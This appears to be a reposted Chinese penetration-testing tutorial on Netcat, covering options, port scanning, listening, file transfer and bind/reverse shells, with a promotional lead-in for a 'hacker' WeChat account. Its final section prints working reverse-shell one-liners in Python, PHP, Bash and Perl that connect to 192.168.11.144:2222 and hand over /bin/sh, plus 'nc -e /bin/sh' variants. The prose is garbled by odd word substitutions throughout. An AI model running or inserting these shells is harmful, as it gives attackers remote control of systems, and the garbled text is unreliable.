关注我的微信"大众年夜众号:黑客Anony

可免费领取全套网络安全渗透视频教程,配套攻防靶场。

序言

跃程话费充值php瑞士军刀Netcat应用办法总结 SQL

最近在做渗透测试的时候碰着了端口监听和shell的反弹问题,在这个过程中自己对Netcat这一款神器有了新的认识,现将一些Netcat的用法做一个小总结,希望对各位有帮助!

Netcat简介

Netcat是一款非常出名的网络工具,简称“NC”,有渗透测试中的“瑞士军刀”之称。
它可以用作端口监听、端口扫描、远程文件传输、还可以实现远程shell等功能。
总之功能强大,可以用一句较为风趣的话来描述NC的强大——“你的想象力是局限NC的瓶颈”。

Netcat选项参数解释

功能解释:端口扫描、端口监听、远程文件传输、远程shell等等;

语  法:nc [-hlnruz][-g<网关...>][-G<指向器数目>][-i<延迟秒数>][-o<输出文件>][-p<通信端口>][-s<来源位址>][-v...][-w<超时秒数>][主机名称][通信端口...]

参  数:

-g <网关> 设置路由器跃程通信网关,最多可设置8个;

-G <指向器数目> 设置来源路由指向器,其数值为4的倍数;

-h 在线帮助;

-i <延迟秒数> 设置韶光间隔,以便传送信息及扫描通信端口;

-l 利用监听模式,管控传入的资料;

-n 直策应用IP地址,而不通过域名做事器;

-o <输出文件> 指定文件名称,把往来传输的数据以16进制字码倾倒成该文件保存;

-p <通信端口> 设置本地主机利用的通信端口;

-r 乱数指定本地与远端主机的通信端口;

-s <来源位址> 设置本地主机送出数据包的IP地址;

-u 利用UDP传输协议;

-v 显示指令实行过程;

-w <超时秒数> 设置等待连线的韶光;

-z 利用0输入/输出模式,只在扫描通信端口时利用。

Netcat大略单纯利用

连接到远程主机

命令:nc -nvv Targert_IP Targert_Port

监听本地主机

命令:nc -l -p Local_Port

端口扫描

扫描指定主机的单一端口是否开放

格式:nc -v target_IP target_Port

扫描指定主机的某个端口段的端口开放信息

格式:nc -v -z Target_IP Target_Port_Start - Target_Port_End

扫描指定主机的某个UDP端口段,并且返回端口信息

格式:nc -v -z -u Target_IP Target_Port_Start - Target_Port_End

扫描指定主机的端口段信息,并且设置超时时间为3秒

格式:nc -vv(-v) -z -w time Target_IP Target_Port_Start-Targert_Port_End

端口监听

监听本地端口

格式:nc -l -p local_Port

注:先设置监听(不能涌现端口冲突),之后如果有外来访问则输出该详细信息到命令行

监听本地端口,并且将监听到的信息保存到指定的文件中

格式:nc -l -p local_Port > target_File

连接远程系统

格式:nc Target_IP Target_Port

之后可以运行HTTP要求

FTP匿名探测

格式:ncTargert_IP 21

文件传输

传输端:

格式:nc Targert_IP Targert_Port < Targert_File

吸收端:

格式:nc -l Local_Port > Targert_File

大略单纯谈天

本地主机

命令:nc -l 8888

远程主机

命令:nc Targert_IP Targert_Port

蜜罐

作为蜜罐利用1:

命令:nc -L -p Port

注:利用“-L”参数可以一直的监听某一个端口,知道Ctrl+C为止

作为蜜罐利用2:

命令:nc -L -p Port >log.txt

注:利用“-L”参数可以一直的监听某一个端口,知道Ctrl+C为止,同时把结果输出到log.txt文件中,如果把“>”改为“>>”即追加到文件之后。

这一个命令参数“-L”在Windows中有,现在的Linux中是没有这个选项的,但是自己可以去找找,这里只是想到了之前的这个利用,以是提出来大略先容一下!

获取shell

简述:获取shell分为两种,一种是正向shell,一种是方向shell。
如果客户端连接做事器端,想要获取做事器真个shell,那么称为正向shell,如果是客户端连接做事器,做事器端想要获取客户真个shell,那么称为反向shell

正向shell

本地主机:

命令:nc Targert_IP Targert_Port

目标主机:

命令:nc -lvp Targert_Port -e /bin/sh

反向shell

本地主机:

命令: nc -lvp Target_Port

目标主机:

命令: nc Targert_IP Targert_Port -e /bin/sh

分外情形——目标主机上没有Netcat,如何获取反向shell

在一样平常情形下,目标主机上一样平常都是不会有Netcat的,此时就须要利用其他替代的方法来实现反向链接达到攻击主机的目的,下面大略的先容几种反向shell的设置。

python反向shell

目标主机端实行语句:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.11.144",2222));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

本地主机

目标主机

PHP反向shell

目标主机端实行语句:

php -r '$sock=fsockopen("192.168.11.144",2222);exec("/bin/sh -i <&3 >&3 2>&3");'

本地主机:

目标主机:

Bash反向shell

目标主机端实行语句:

bash -i>&/dev/tcp/192.168.11.144/2222 0>&1

本地主机:

目标主机:

Perl反向shell

目标主机端实行语句:

perl -e 'use Socket;$i="192.168.11.144";$p=2222;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

本地主机

目标主机

注:书写的时候一定要把稳这里单引号、双引号是英文格式的,不然会报缺点!

总结:有一句话为“温故而知新”,同时又有一句话为“实践出真知”,当这两句话同时践行的时候,就会擦出不一样的火花,你会看到你之前未见到的,节制到你之前生疏的技能!
Netcat固然好用,但是也要经由实践才知道,那你还在等什么呢?

好,本日的分享就到这里。

更多互联网圈内,黑客教程,干货分享欢迎来同名公号【黑客Anony】

本文:Fly出路似锦,

转载请注明来自 FreeBuf.COM